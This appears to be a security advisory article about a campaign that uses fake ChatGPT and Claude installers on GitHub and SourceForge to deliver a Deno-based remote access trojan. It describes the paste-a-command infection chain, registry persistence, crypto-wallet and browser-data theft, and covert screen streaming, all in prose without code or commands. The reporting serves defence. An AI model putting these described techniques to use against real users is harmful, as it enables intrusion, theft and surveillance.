What the Deno RAT Fake AI Installer Campaign Is
The Deno RAT fake AI installer campaign is a malware operation where attackers publish counterfeit ChatGPT, Claude, and other software installers on trusted developer platforms like GitHub and SourceForge, then trick users into running terminal commands that silently install a remote access Trojan built on the Deno JavaScript runtime for stealthy control, data theft, and surveillance. The downloads pose as installers or plugins for popular tools such as ChatGPT, Claude, AutoTune, Kontakt, Ableton Live, and ZENOLOGY, making them attractive to developers, creators, and power users. Behind the scenes, these fake AI installers deploy a backdoor called DinDoor, which in turn loads a Deno-based RAT that Malwarebytes has tracked as Smokest. Compromised YouTube channels with AI-generated videos funnel traffic to these malicious repositories, giving the campaign reach and credibility among people looking for advanced or unofficial AI tools.
How the Infection Chain Works on GitHub and SourceForge
The attack starts on GitHub or SourceForge, where repositories host detailed instructions telling visitors to open a terminal and paste a command tailored for Windows or macOS. That command downloads either an MSI installer or a PowerShell script from GitHub, which then installs Scoop and WinGet before pulling in the legitimate Deno runtime. Once Deno is present, it is used to fetch and execute the DinDoor backdoor directly from a remote server, with the next stage streamed through standard input and never written to disk. DinDoor adds a registry Run key for persistence, fingerprints the system, and contacts a command-and-control server to download more payloads, including the Deno RAT. According to Malwarebytes, attackers rotate GitHub accounts and create multiple repositories per account, refreshing lures as old ones are removed to sustain the GitHub malware threats.
What Deno RAT Can Do: From Crypto Theft to Screen Streaming
Once the Deno-based RAT is installed, operators gain wide control over an infected machine. The malware can run arbitrary commands and PowerShell scripts, manipulate files, start or kill processes, and create SOCKS5 proxy tunnels for further abuse. Its stealer module is tuned for crypto wallet stealing, targeting more than 50 browser wallet extensions and 10 standalone wallet applications such as Atomic Wallet, Exodus, Electrum, and ByteCoin. It also harvests data from Chromium-based browsers including Chrome, Brave, Edge, Opera, and Vivaldi, as well as Telegram, Discord, and Lightcord. One of the most worrying features is its stealth surveillance ability: the RAT launches Microsoft Edge in the background, connects to it through the Chrome DevTools Protocol, then injects a WebRTC page to stream screen video over a peer-to-peer connection, hiding the traffic inside a normal browser process.
Why This Is a Supply Chain Attack on Open Platforms
This campaign shows how supply chain attacks can grow inside ecosystems developers trust every day. Instead of compromising official binaries, attackers assemble a chain of legitimate tools—GitHub or SourceForge hosting, Scoop, WinGet, and the Deno runtime—to deliver malicious code. Because each piece looks normal in isolation, many security tools treat the activity as benign. GitHub and SourceForge lend reputational cover, while AI-themed lures such as fake ChatGPT and Claude installers capitalize on current developer interest in advanced AI tools. Malwarebytes notes that the fake software aims at creators, AI enthusiasts, gamers, and technical users who often download unofficial tools, cracked software, or community installers. The result is a supply chain attack where seemingly helpful AI utilities become vehicles for Deno RAT malware, crypto wallet stealing, and long-term remote control.
How Developers Can Stay Safe from Fake AI Installers
Developers and power users should treat any installer or script from community repositories as untrusted until proven otherwise. Always obtain ChatGPT, Claude, and other AI tools from official distribution channels, not from random GitHub or SourceForge projects promoted in YouTube comments or video descriptions. Be wary of instructions that ask you to paste long terminal commands, especially those that install package managers and runtimes as a side effect. Review scripts before running them, confirm repository owners are legitimate, and check for unexpected network calls or download URLs. Security tools should be configured to monitor command-line activity and browser processes like Microsoft Edge for unusual behavior such as hidden WebRTC pages. By verifying authenticity up front, developers can reduce exposure to fake AI installers and the Deno RAT malware supply chain attacks spreading across open-source platforms.